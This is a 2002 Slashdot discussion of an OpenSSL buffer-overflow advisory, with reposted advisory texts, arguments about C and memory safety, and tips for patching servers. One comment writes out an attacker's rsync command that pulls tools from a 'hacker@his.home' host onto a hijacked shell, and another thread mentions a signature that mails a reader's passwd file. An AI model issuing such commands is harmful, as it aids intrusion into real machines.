OpenSSL Security Update 224
Pseud0 writes "Just announced on the OpenSSL announce mailing list. The affected versions are "[...] OpenSSL 0.9.6d or earlier, or 0.9.7-beta2 or earlier or current development snapshots of 0.9.7 to provide SSL or TLS is vulnerable, whether client or server. 0.9.6d servers on 32-bit systems with SSL 2.0 disabled are not vulnerable." Get your updates here."
Logic behind this (Score:2, Insightful)
Yeah... Real smart.
Honestly, when I want security updates, I'll read BUGTRAQ, when I want light fluff about the latest Stallman-ism, I'll read
(Still, if you want to do this, add a security section or something, jeez)
Re:Logic behind this (Score:2, Informative)
Well, most of us shouldn't have to download the patches. Instead, we wait for our favourite distribution to come up with rebuilt packages and then install. At least in redhat, debian and mandrake. Probably others.
But... i agree with you, sort of. I understand that something of this scale is newsworthy, but still most of us don't need the source and/or patches directly. That's what rh's errata (and similar) are for. So, the actual announcement could have been slightly more subtle, or something...
But people shouldn't "want" security updates, people _need_ security updates, so i guess that's the reasoning behind this news story.
Re:Logic behind this (Score:1)
Plus, if you don't compile it yourself, who knows what extra goodies are being installed that you don't want.
Re:Logic behind this (Score:1)
Well, that's always the thing between source and binary distros.
And really, in most cases you don't need to be up-to-date instantly. Think about updating browsers etc.
Plus, if you don't compile it yourself, who knows what extra goodies are being installed that you don't want.
Well, that's a question of trust (and MD5-signatures), but, honestly, how many of us go through the source, line by line?
(but i'm a gentoo user myself, altough i use redhat at work. i don't like to think of myself as biased in any way.)
Re:Logic behind this (Score:2)
(Honestly, you shouldn't either, thats why you should patch any hole immediately)
Re:Logic behind this (Score:1)
Ok, you have an extremely good point there. I _don't_ think that people should just accept vulnerabilities, altough in most cases you can accomodate, shut down non-critical services etc.
But really, if you happen to be vendor-dependent, then there's not much you can do. Of course you could build it yourself,replace the binaries and fix the packaging system used later (when it arrives). I did this last time openssh had issues. But with openssl i don't think you can get away that easily.
Still, oh well, back to slackware, then.
Re:Logic behind this (Score:5, Informative)
It's now 9:44 and all of my servers are patched. It took me 5 seconds to schedule it, and just drank coffee and read
It's well worth it. We're all sold on it, and the Novell guys are envious.
Re:Logic behind this (Score:1)
Re:Logic behind this (Score:2)
Re:Logic behind this (Score:2)
Mirrors list mirrored (Score:5, Informative)
Re:Mirrors list mirrored (Score:1)
Personally, I would expect an e-mail from him
Re:Mirrors list mirrored (Score:2)
"Naah, I removed those pictures months ago."
Besides, I'm used to getting email from UMass sysadmins -- although now I suppose we're going to have to quibble about who gets to claim the title of "The UMass sysadmin". (It's a largish school, there are a lot of us -- usually multiple BOFHen per department, particularly in the sciences.:)
(Who's been accused of many things, but never schizophrenia.)Re:Mirrors list mirrored (Score:1)
Would have been quite helpful if the announcement (particularly the announcement on the front page here) could have been held until after most of the mirrors had updated.
It might actually be a very good idea to move this story off the main page for a few hours...
Re:Mirrors list mirrored (Score:2, Insightful)
# ftp://opensores.thebunker.net/pub/mirrors/openssl
and ftp.openssl.org
all the other's i tried weren't up to date.
Question (Score:3, Interesting)
Answer (Score:5, Informative)
Thanks (Score:1)
How about some common courtesy? (Score:5, Insightful)
Re:How about some common courtesy? (Score:5, Informative)
Here's a link [securityfocus.com].
Re: How about some common courtesy? (Score:3, Insightful)
> 1. The client master key in SSL2 could be oversized and overrun a buffer.
> 2. The session ID supplied to a client in SSL3 could be oversized and overrun a buffer.
Forgive me for opening the language flamewars again, but doesn't anyone else find this "a wee bit inexcusable" in software designed for secure network access?
As has been mentioned here countless times before, there are languages that disallow buffer overflows (period), and for people who don't want to use those languages there are libraries that replace built-in I/O functions for the same effect.
Hasn't it occured to anyone in the security industry that buffer overflows are a serious threat, and for things like SSL, BO-proof coding should be adopted as a matter of policy, rather than as a bug-to-fix-when-we-catch-it?
I'm not trying to villify anyone, and I'm really glad to see that someone has been hired to do a thorough security audit... but I just find this kind of thing completely incomprehensible, when it's so easy to avoid it in the first place.
Re: How about some common courtesy? (Score:2)
Re: How about some common courtesy? (Score:2, Insightful)
A few reasons:
Re: How about some common courtesy? (Score:2)
> My point: the way C code is written, as well as the C language itself, makes doing 100% solid bounds checking basically impossible.
If true, that sounds like sufficient reason to avoid using C when writing secure networking software.
On the upside... (Score:2)
Talking to a guy who writes security software based on OpenBSD (and works on OpenBSD in his spare time), that's why he preferred to use C (in very small programs, containing only the bits of code that absolutely had to run as root and using some form of interprocess communication to talk to the bells-and-whistles provision daemon) for security-critical daemons.
Re: How about some common courtesy? (Score:2)
> bugs exist. deal with it. expecting anything less is naive.
That's exactly the attitude that baffles me. Sure bugs exist... but why not eliminate the ones that are easy to eliminate?
Especially something as déclassé as a buffer overflow in "secure" networking infrastructure?
> to rewriting these in 'safe' languages. thank you very much but no.
The issue I wanted to raise isn't a suggestion for a re-write, but rather, why wasn't it done right in the first place? This could have been prevented easily, either by choice of language or use of alternative I/O routines.
> pushing the responsibity for security off the software author and onto the compiler/virtual machine is not a solution. it just deflects blame.
That's a curious excuse^w attitude.
> not to mention the performance implications of doing crypto in a virtual machine. blech
I certainly didn't have Java in mind. There are plenty of ways of avoiding this problem without resort to a virtual machine.
Happy Xmas (Score:5, Informative)
OpenSSL Security Advisory [30 July 2002]
This advisory consists of two independent advisories, merged, and is an official OpenSSL advisory.
Advisory 1
A.L. Digital Ltd and The Bunker (http://www.thebunker.net/) are conducting a security review of OpenSSL, under the DARPA program CHATS.
Vulnerabilities
All four of these are potentially remotely exploitable.
1. The client master key in SSL2 could be oversized and overrun a buffer. This vulnerability was also independently discovered by consultants at Neohapsis (http://www.neohapsis.com/) who have also demonstrated that the vulerability is exploitable. Exploit code is NOT available at this time.
2. The session ID supplied to a client in SSL3 could be oversized and overrun a buffer.
3. The master key supplied to an SSL3 server could be oversized and overrun a stack-based buffer. This issues only affects OpenSSL 0.9.7 before 0.9.7-beta3 with Kerberos enabled.
4. Various buffers for ASCII representations of integers were too small on 64 bit platforms.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-0656 to issues 1-2, CAN-2002-0657 to issue 3, and CAN-2002-0655 to issue 4.
In addition various potential buffer overflows not known to be exploitable have had assertions added to defend against them.
Who is affected?
Everyone using OpenSSL 0.9.6d or earlier, or 0.9.7-beta2 or earlier or current development snapshots of 0.9.7 to provide SSL or TLS is vulnerable, whether client or server. 0.9.6d servers on 32-bit systems with SSL 2.0 disabled are not vulnerable.
SSLeay is probably also affected.
Recommendations
Apply the attached patch to OpenSSL 0.9.6d, or upgrade to OpenSSL 0.9.6e. Recompile all applications using OpenSSL to provide SSL or TLS.
A patch for 0.9.7 is available from the OpenSSL website (http://www.openssl.org/).
Servers can disable SSL2, alternatively disable all applications using SSL or TLS until the patches are applied. Users of 0.9.7 pre-release versions with Kerberos enabled will also have to disable Kerberos.
Client should be disabled altogether until the patches are applied.
Known Exploits
There are no know exploits available for these vulnerabilities. As noted above, Neohapsis have demonstrated internally that an exploit is possible, but have not released the exploit code.
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN- 2002-0655
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN- 2002-0656
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN- 2002-0657
Acknowledgements
The project leading to this advisory is sponsored by the Defense Advanced Research Projects Agency (DARPA) and Air Force Research Laboratory, Air Force Materiel Command, USAF, under agreement number F30602-01-2-0537.
The patch and advisory were prepared by Ben Laurie.
Advisory 2
Vulnerabilities
The ASN1 parser can be confused by supplying it with certain invalid encodings.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-0659 to this issue.
Who is affected?
Any OpenSSL program which uses the ASN1 library to parse untrusted data. This includes all SSL or TLS applications, those using S/MIME (PKCS#7) or certificate generation routines.
Recommendations
Apply the patch to OpenSSL, or upgrade to OpenSSL 0.9.6e. Recompile all applications using OpenSSL.
Users of 0.9.7 pre-release versions should apply the patch or upgrade to 0.9.7-beta3 or later. Recompile all applications using OpenSSL.
Exploits
There are no known exploits for this vulnerability.
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN- 2002-0659
Acknowledgements
This vulnerability was discovered by Adi Stav and James Yonan independently. The patch is partly based on a version by Adi Stav.
The patch and advisory were prepared by Dr. Stephen Henson.
Re:Happy Xmas (Score:1)
Re:Happy Xmas (Score:2)
I do have it, but I left it off because of the amount of mangling that I had to do to the message to get it to accept that I thought it was unwise to do the same to a patch...
Doh! received it on suse-security, so here is a link [suse.com] to their archive of the mail (including patch). Enjoy...
Re:How about some common courtesy? (Score:1)
It's a little slow.
But i really should post a mirror.
but then the "Lameness filter encountered. Post aborted!
Reason: Please use fewer 'junk' characters."
does not allow a post of this on this page.
2 Vulnerabilities
--------------- The ASN1 parser can be confused by supplying it with certain invalid
encodings. The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2002-0659 to this issue.
Damn, my application is not even yet realeased and already i must check it's security. I should use the openssl library veriosn 1.0.
Re:How about some common courtesy? (Score:3, Informative)
Re:How about some common courtesy? (Score:2)
Then why would the story even be posted here? *IF* they are going to post a story like this, they should put some information in the story. Otherwise, why bother? They had to have the info sitting right in front of them. Do you know how many hits that would have saved the other websites? Slashdot is about reposting stories, it is a meta-news site. News for Nerds and all. Pointing me to another story without giving me any details isn't news.
The Slashdot effect - enough is enough (Score:4, Insightful)
Isn't it time that
I like reading and posting here, but the
Re:The Slashdot effect - enough is enough (Score:1)
Re:The Slashdot effect - enough is enough (Score:2, Insightful)
Re:The Slashdot effect - enough is enough (Score:3, Insightful)
I can sort-of understand not caching pages from commercial sites but from a site that is part of the "Open Source" community? The one that
Re:The Slashdot effect - enough is enough (Score:2)
The problem is that cacheing proxies are less and less used by ISPs nowadays as bandwidth is cheaper compared to the price of operating a proxy: cost of hardware, administration, fault tolerance etc. Big caches with lots of users are a lot of trouble; I guess it's however a good deal to implement them for medium/small sized networks, with at most a few thousand users.
BTW I was thinking of a way to entice users to set up the proxy using traffic shaping and w/o using transparent proxy, which can be quite annoying at times: limit the bandwidth available on direct port 80 connections, but provide unlimited bandwidth through the proxy.
Re:The Slashdot effect - enough is enough (Score:3, Insightful)
Sure, it's a great idea, but it has a lot of implications. For example, commercial sites rely on their banner ads to generate revenue. If I cache one of their pages, this will mess with their statistics, and mess with their banner ads. In other words, this will piss them off.
Fair enough, and I agree - commerical sites probably would rather see the direct flow of visitors. However...
Of course, most of the time, the commercial sites that actually have income from banner ads easily withstand the Slashdot Effect. So perhaps we could draw the line at sites that don't have ads. They are, after all, much more likely to buckle under the pressure of all those unexpected hits.
Like OpenSSL - they are not commerical and cannot be expected to withstand the load of a Slashdotting and whatever other security lists have posted this.
But what happens if I cache the site, and they update themselves? Once again, I'm transmitting data that I shouldn't be, only this time my cache is out of date!
Well, yeah, that could be a problem. But then you get to:
I could try asking permission, but do you want to wait 6 hours for a cool breaking story while we wait for permission to link someone?
Well, yeah! I'd love to wait six hours to read a cool breaking story if it means I get to read the linked content or the mirrors have time to update. It sure beats waiting a day for the Slashdot effect to have worn off and for the servers to be responsive again, or pissing off all the mirror operators who now can't get at the content they intend to mirror.
Bottom line, I think contacting the owners of sites that probably cannot withstand the Slashdot Effect would be common courtesy - and possibly avoid some of the embarassments we've seen with Slashdot posting news of a release that hasn't actually happened.
So while caching content may not be the best answer, at least contact the site operators. They might tell you to wait, or to use a mirror, or at least know that they can expect higher load for a while and can possibly reduce load on their end. It just seems like the smart and courteous thing to do.
(And if anyone wants to question "a day" as for how long the Slashdot Effect lasts, yeah, I'm being overly drammatic. The Slashdot Effect generally lasts for around four hours on a site and then starts tappering off (with peak transfer from about 10 minutes after the link goes up to around 2 hours). Obviously, if there's a lot of data to transfer, the effect lasts longer. This is based on both the data transfer graphs generated with the Linux-powered Christmas tree and when I posted a mirror of KDE screenshots. Depending on the vitality of the content, like security updates, though, it's better to wait for the mirrors to get the content then to just send everyone looking all at once.)
Re:The Slashdot effect - enough is enough (Score:2)
Of course, the flip side is this: the grandparent post suggested slashdot "pull a google". Why reinvent the wheel [google.com]? Why not just force editors to include links to the google cache whenever possible. Keep in mind that the cached page [216.239.39.100] will have a link to see the uncached version, so people who want to get up-to-date information can. If the focus of the story is images rather than text, include some links to the google cache of the images [google.com] (maybe below the fold if there's a lot of them, so they don't clutter up the main page).
Taco & the gang have this attitude that there's nothing they can do about it. I disagree. It wouldn't even have to be that hard.
Just my two and a half cents.
Re:The Slashdot effect - enough is enough (Score:2)
Re:The Slashdot effect - enough is enough (Score:2)
Certainly, if bandwidth became prohibitive, OSDN and Google could participate in some kind of joint-marketing project, with branded links ("click here for OpenSSL -- Powered by Google!") and/or advertising. I'd gladly put up with unobtrusive advertising in the google cache if it meant that I could get what I need to secure my system.
Re:The Slashdot effect - enough is enough (Score:2)
If this is how you feel, then just read stories on Slashdot when they're six hours old. Slashdottings don't really last that long, it's only the top stories that get clobbered. If you see something posted and can't get to it, relax, go get some coffee, play a round of pool (or do some sysadminning, if they actually make you work), then come back and get what you need when the rush has worn down a little.
I understand you being concerned about security updates, but realistically, most security problems are in the wild before fixes are available anyway. System administration can't depend purely on getting the patch before the bad guy gets the exploit. Sooner or later that will fail.
Personally, if there are people out there who know something I use is vulnerable, I want to know as soon as possible, rather than wait until I'm sure I can get the patch.
Re:The Slashdot effect - enough is enough (Score:2)
Bulletin (Score:2, Informative)
This advisory consists of two independent advisories, merged, and is an official OpenSSL advisory.
Advisory 1
A.L. Digital Ltd and The Bunker (http://www.thebunker.net/) are conducting a security review of OpenSSL, under the DARPA program CHATS.
Vulnerabilities
All four of these are potentially remotely exploitable.
1. The client master key in SSL2 could be oversized and overrun a buffer. This vulnerability was also independently discovered by consultants at Neohapsis (http://www.neohapsis.com/) who have also demonstrated that the vulerability is exploitable. Exploit code is NOT available at this time.
2. The session ID supplied to a client in SSL3 could be oversized and overrun a buffer.
3. The master key supplied to an SSL3 server could be oversized and overrun a stack-based buffer. This issues only affects OpenSSL 0.9.7 before 0.9.7-beta3 with Kerberos enabled.
4. Various buffers for ASCII representations of integers were too small on 64 bit platforms.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-0656 to issues 1-2, CAN-2002-0657 to issue 3, and CAN-2002-0655 to issue 4. In addition various potential buffer overflows not known to be exploitable have had assertions added to defend against them.
Who is affected?
Everyone using OpenSSL 0.9.6d or earlier, or 0.9.7-beta2 or earlier or current development snapshots of 0.9.7 to provide SSL or TLS is
vulnerable, whether client or server. 0.9.6d servers on 32-bit systems with SSL 2.0 disabled are not vulnerable. SSLeay is probably also affected.
Recommendations
Apply the attached patch to OpenSSL 0.9.6d, or upgrade to OpenSSL 0.9.6e. Recompile all applications using OpenSSL to provide SSL or
TLS. A patch for 0.9.7 is available from the OpenSSL website (http://www.openssl.org/).
Servers can disable SSL2, alternatively disable all applications using SSL or TLS until the patches are applied. Users of 0.9.7 pre-release
versions with Kerberos enabled will also have to disable Kerberos. Client should be disabled altogether until the patches are applied.
Known Exploits
There are no know exploits available for these vulnerabilities. As noted above, Neohapsis have demonstrated internally that an exploit is
possible, but have not released the exploit code.
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=C
http://cve.mitre.org/cgi-bin/cvename.c
http://cve.mitre.org/cgi-bin/cvename.c
Acknowledgements
The project leading to this advisory is sponsored by the Defense Advanced Research Projects Agency (DARPA) and Air Force Research Laboratory, Air Force Materiel Command, USAF, under agreement number F30602-01-2-0537. The patch and advisory were prepared by Ben Laurie.
Advisory 2 Vulnerabilities
The ASN1 parser can be confused by supplying it with certain invalid encodings. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2002-0659 to this issue.
Who is affected?
Any OpenSSL program which uses the ASN1 library to parse untrusted data. This includes all SSL or TLS applications, those using S/MIME (PKCS#7) or certificate generation routines.
Recommendations
Apply the patch to OpenSSL, or upgrade to OpenSSL 0.9.6e. Recompile all applications using OpenSSL.
Users of 0.9.7 pre-release versions should apply the patch or upgrade to 0.9.7-beta3 or later. Recompile all applications using OpenSSL.
Exploits
There are no known exploits for this vulnerability.
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=C
Acknowledgements
This vulnerability was discovered by Adi Stav and James Yonan independently. The patch is partly
based on a version by Adi Stav.
The patch and advisory were prepared by Dr. Stephen Henson.
Combined patches for OpenSSL 0.9.6d:
http://www.openssl.org/news/patch_200207
Combined patches for OpenSSL 0.9.7 beta 2:http://www.openssl.org/news/patch_20020730_0_9_
URL for this Security Advisory: http://www.openssl.org/news/secadv_20020730.txt
Security Advisory from Bugtraq (Score:3, Informative)
Advisory + Patch (Score:4, Informative)
Argh. (Score:1)
Red Hat's servers are
Great, just great...
Advisory Mirror (Score:3, Informative)
advisory text mirrored (Score:1)
Debian users: (Score:2)
Ahh, how I love debian
Re:Debian users: (Score:3, Funny)
Unless some funky patching is going on, let's link to a deb that is actually not vulnerable here ok?
Re:Debian users: (Score:3, Informative)
Re:Debian users: (Score:2)
Re:Debian users: (Score:2, Informative)
Re:Debian users: (Score:2)
So yes, some "funky patching" is going on
BASTARD! Thanks for your fucking criminal sig. (Score:2)
I wonder if you are the same matts as on perlmonks.org. I am the same mattr. How annoying.
I'll thank you to remove that sig. Now, please. It's not funny to lay a pipe bomb and a box of matches on the curb; some people have a death wish and you are just helping them along.
Re:[expl]! Thanks for your [expl] criminal sig. (Score:2)
1. My sig mails you your own passwd file. Were you even in 'first grade perl' you could figure that out. Maybe you can actually read Perlmonks instead of just being a groupie there. It makes a point that idiots like you shouldn't blindly exec perl one-lineers off slashdot sigs. See my profile for an actual nasty version and more info.
2. If your english skills are soo poor that you can't differentiate from "Mr_Perl" and "mattr" I really wonder how you managed those 3 paragraphs.
Re:[expl]! Thanks for your [expl] criminal sig. (Score:2)
B. It didn't require too much sweat to discover your lame-ass justification for your stupid (and criminal FWIW) sig. As it is there is little danger of anyone executing your sig, and all I have to do is wait a couple years or more until you get older and some similar stupidity blows up magnificently in your pinched egotistical face. Have a nice life (unlikely).
Re:Debian users: (Score:2)
http://mordikyn.dynu.com/openssl_0.9.6e-1_i
Slashdot is hilarious (Score:1, Funny)
-- The_Messenger
(Banned for telling the truth.)
Mirrors (Score:5, Informative)
Most mirrors are not up to date yet, except:
Slashdotted (Score:1)
Agreed - please mirror contents (Score:2)
Obviously if you link to nytimes.com or cnet.com they're equipped to handle millions of visitors, but openssl.org? I doubt it very much.
GNU TLS (Score:2, Interesting)
GNU TLS [gnu.org] is finally beginning to be usable. It even has wrapper for OpenSSL API providing source code compatibility for it.
I just today started looking into it more deeply as I'll need to implement SSL and TLS support fo my imapd [procontrol.fi]. The documentation and example programs with gnutls are quite good. And given that the next thing I read after the docs is OpenSSL vulnerability, I'm pretty sure I'll just use gnutls API directly.
No signature on the bulletin to Bugraq (Score:4, Interesting)
Redhat has Errata posted already (Score:2)
This is the first place I looked this morning (as I run several RH7.2 servers). The discussion there seems to be fairly similar to the copies of the advisory I've seen posted here, so I'd be willing to bet it's legit.
Upgrading SSL is nothing like upgrading SSH (Score:5, Interesting)
I have 18 firewalls to update (I sell these and support them, it's a nice way to suppliment my income). I'm not having much luck updating them though.
So far (on 5/7 firewalls), updating the ssl libraries caused ssh to kick out. This is very much unlike upgrading ssh, where the currently running sessions would stay active and you just kill off the 'parent' sshd process and restart sshd to upgrade.
Does anyone know why upgrading the shared lib is kicking out running sessions of ssh linked against it? Short of compiling sshd statically, is there any way around this? So far all the boxes are local but I have a few that are quite a distance and short of enabling telnet with a throwaway root account or statically compiling a temporary sshd, I'm screwed. :-)
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
Odd, I just updated ssl remotely via an ssh connection (compiled against the previous libs). I then recompiled ssh without problem.
Like I said, 5/7 boxes failed to do this nicely. Two of them worked as I had thought they should -- yes the libs change underneath you but you're running from in-memory copies. Someone told me this variation was due to glibc but I haven't found anything conclusive.
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
I was updating two of my boxes from home while at work. I ssh into one box from work and from that ssh session I ssh into the other box (due to firewall configuration).
On the "main" box -- the one to which I go in from work -- updating openssl was smooth and efficient, as was updating ssh. Download source, compile and go.
On the "workstation" box -- the one I go in from the main box -- I had a problem when trying to run the configure script for openssh after compiling openssl. Turns out that it is looking for a shared libssl rather than a static one! I don't know why this happened (both machines use openssh source from the same tarball!), but I recompiled openssl with shared support enabled, and the connection dropped as soon as I tried to install.
Openssh shouldn't be using shared openssl libs (in fact, nothing should use shared openssl libs according to the readme), so I suspect I'll need to check that when I recompile it. I know that the ssh compile on my "main" box isn't using shared libs because I have no libssl.so, only libssl.a. I suspect that the presence of an existing shared openssl library ($#@$ing default install) triggered a detection in the configure script.
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
I think you found the reason why. Interesting, and thanks for sharing the info.
The OpenSSL INSTALL file doesn't exressly forbid shared libraries, just that they're experimental. I think I've learned my lesson though; static ssl libs for me. :-)
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
The deal is that the version of SSH may not support the API OpenSSL provides in the latest patched version. You may have to wait for SSH to be updated to work with the newest one.
Interesting theory but why would a simple recompile of ssh work then? If the API changed I would have thought to see compiler errors.
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
A workaround would be to move the existing library aside before you do make install. (e.g. mv libssl.so.0.9.6 libssl.so.0.9.6-OLD)
I've noted that for future reference. :-) Offhand, do you know if glibc/gcc does this automatically when you install updated system libraries? I don't ever recall this happenning with those libraries.
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
make install && /sbin/ldconfig && /etc/init.d/sshd restart
That's exactly what I did for the remainder of the installs but I used nohup instead. Same effect.
Funny, but the rest of the systems didn't crash out anyway. Unreal. :-)
Re:Upgrading SSL is nothing like upgrading SSH (Score:2)
Try copying the shared SSL library to another location, then start a new sshd on a different port using LD_LIBRARY_PRELOAD.
That would have been the quick way to do it. :-) I ended up using an idea very much like vph's to solve it. Thanks for the idea though, I'll keep that stored away because I'm sure it'll be handy elsewhere.
Details from the Debian Security Advisory... (Score:2, Informative)
Package : openssl
Problem type : multiple remote exploits
Debian-specific: no
CVE : CAN-2002-0655 CAN-2002-0656 CAN-2002-0657 CAN-2002-0659
The OpenSSL development team has announced that a security audit by A.L.
Digital Ltd and The Bunker, under the DARPA CHATS program, has revealed
remotely exploitable buffer overflow conditions in the OpenSSL code.
Additionaly, the ASN1 parser in OpenSSL has a potential DoS attack
independently discovered by Adi Stav and James Yonan.
CAN-2002-0655 references overflows in buffers used to hold ASCII
representations of integers on 64 bit platforms. CAN-2002-0656
references buffer overflows in the SSL2 server implementation (by
sending an invalid key to the server) and the SSL3 client implementation
(by sending a large session id to the client). The SSL2 issue was also
noticed by Neohapsis, who have privately demonstrated exploit code for
this issue. CAN-2002-0659 references the ASN1 parser DoS issue.
These vulnerabilities have been addressed for Debian 3.0 (woody) in
openssl094_0.9.4-6.woody.0, openssl095_0.9.5a-6.woody.0 and
openssl_0.9.6c-2.woody.0.
These vulnerabilities are also present in Debian 2.2 (potato), but no
fix is available at this moment.
We recommend you upgrade your OpenSSL as soon as possible. Note that you
should restart any daemons running SSL. (E.g., ssh or ssl-enabled
apache.)
Patches for old versions (Score:2, Informative)
Date: Tue, 30 Jul 2002 14:42:12 -0300
From: "Ademar de Souza Reis Jr." <ademar@conectiva.com.br>
Subject: Re: OpenSSL patches for other versions
To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Cc: Ben Laurie <ben@algroup.co.uk>,
OpenSSL Announce <openssl-announce@openssl.org>,
OpenSSL Dev <openssl-dev@openssl.org>, openssl-users@openssl.org
X-Url: http://www.ademar.org/
[-- Attachment #1 --]
[-- Type: text/plain, Encoding: 7bit, Size: 1.0K --]
On Tue, Jul 30, 2002 at 11:15:00AM +0100, Ben Laurie wrote:
> Enclosed are patches for today's OpenSSL security alert which apply to
> other versions. The patch for 0.9.7 is supplied by Ben Laurie
> <ben@algroup.co.uk> and the remainder by Vincent Danen (email not
> supplied).
>
> Patches are for 0.9.5a, 0.9.6 (use 0.9.6b patch), 0.9.6b, 0.9.6c, 0.9.7-dev.
>
> These patches are known to apply correctly but have not been
> thoroughly tested.
Hello.
While checking the patches you sent I noticed that in the ones for
openssh < 0.9.7-dev, the ASN.1 fix is not present (several checks in
crypto/asn1/asn1_lib.c).
So I backported the fixes based on 0.9.7-dev and in a patch for 0.9.6d sent
by Ben Laurie to openssl-team@openssl.org on July27 (subject: Final
version?).
Patches for 0.9.5a, 0.9.6a and 0.9.6b including fix for ASN.1 vulns attached.
They're not well tested yet - after sucessful compilation.
Cheers.
- Ademar
Once again, paranoia pays off. (Score:2)
To the guy who said that my running SSHd behind stunnel to protect from SSH bugs (such as the recent OpenSSH advisory) was not paranoid enough:
Time to wrap everything in IPSEC, then wait for a new hole in that?
pod2man in Perl 5.6.1 rejected in openssl install (Score:2)
I don't really imagine we need the man pages, but putting a dependency like this in the openssl source is thoughtless - right when we're trying to have confidence in the crew there.
___
Older makefile code avoids the problem (Score:2)
___
Re:Formula for response (Score:1)
I wager that partial disclosure results in only partial patching
buffer overrun != cracked encryption (Score:1)
But, it's important to note here that a buffer or stack overflow is DIFFERENT than cracking the encryption algorithm used. These are buffer overflows, which introduces a DoS condition, or possible remote shell attack. The data transiting the network that is encrypted, however, is still encrypted.
Re:buffer overrun != cracked encryption (Score:1)
Until, at the prompt on their hijacked shell, they type:
rsync -zavuSH -e ssh hacker@his.home:
It's downhill from there (counting root kit installs etc...)
Re:buffer overrun != cracked encryption (Score:1)
Re:buffer overrun != cracked encryption (Score:2, Interesting)
The point is that the actual method of encryption itself, the mathematical formulas and principles, are still very valid and relevent. It just means that you can't leave the backdoor unlocked.
Re:buffer overrun != cracked encryption (Score:2, Insightful)
Righto, but unchecked buffers are a backdoor that most won't notice. Unfortunately many OSS software developers harp about them being easy to find in a good code audit. I think the OpenSSL people got a little to carried away in implemting their encryption strategy and didn't focus on the basics.
However, if M$ ever comes up with a better product it will doubtless say BSD in the comments.
How does this impact OpenSSH? (Score:2)
I'm running OpenSSH 3.4p1 on:
Do I need to rebuild these binaries? When will the OpenSSL audit be complete?
Re:How does this impact OpenSSH? (Score:2)
That would seem to support the linked idea. Don't bet on it though.
Re:Security is a Fallacy (Score:2, Interesting)
So do a cost/benefit analysis, are you better off NOT using SSH/SSL et. al. or does it make sense to use them? Take a look at the history of what you are discussing. I don't believe that SSL has ever been cracked "in the wild". All of the Internet credit card theft I am aware of has been from the server being rooted and access to the data obtained, never through intercepting it en route.
DLR
Re:Security is a Fallacy (Score:2, Informative)
Re:BS. It beats the hell out of the alternative. (Score:1)
Re:BS. It beats the hell out of the alternative. (Score:1)
Yes, the transaction itself (which contains your CC number) might go over the internet securely, but if I wanted your CC#, I wouldn't be sniffing the OC-48 backbones, I'd pop the database that stores it so next time you buy a book or what-not, you don't have to type it in again.
I agree that people need to realize that good security is implemented in a layered approach, and that a secure system is only as strong as it's weakest link. However, I think that your initial post was somewhat immature. "Oh, what the heck -- your box is going to get cracked anyway, just run telnet, ftp, finger, and allow rlogin. It's the same anyway."
Just my opinion.
Re:another victory for Open Source! (Score:1)
you've been drinking the kool-aid again (Score:1)
Re: another victory for Open Source! (Score:3, Informative)
> Thanks to "many eyes," no sooner is a flaw detected than it is patched up!
<pedantic>Actually, "many eyes" didn't have much to do with either facet, this time. The detection was done by the (presumably pay-to-view) eyes at A.L. Digital Ltd and The Bunker, and the fix isn't an "eyes" issue at all, but rather a get-on-the-ball-and-do-it issue.</pedantic>
But you're entirely right about the quick turn-around. The good folk at OpenSSH completely skipped the Six Step Security Patch Development Cycle so commonly used in the commercial software world thes days:
Re:Look in alt.binaries.warez.linux in 15 minutes (Score:2, Funny)
Don't worry about that pesky
What, are you stupid? (Score:2)
Calmly proceed to nearest mirror, FreeBSD users, calmly wait for nectar to import it, other OS's wait for packages, or for itto be imported.
Rushing out in panic is not helping you.
Re:Look in alt.binaries.warez.linux in 15 minutes (Score:2)
If warez folk developed magic powers to undo one-way functions, the world would have much bigger problems than the security of your server.
Re:OK. I admit I'm biting (Score:2)
No.
Yes it does. But I don't think any of the vulernabilities that affect OSSL will affect OSSH.
Re:OK. I admit I'm biting (Score:3, Insightful)
A little clarification might be useful.
Re:vulnerable if you just use it for ssh? (Score:2)
And another thing. If you upgrade your OpenSSL, do you then need to recompile OpenSSH to link to the new libraries?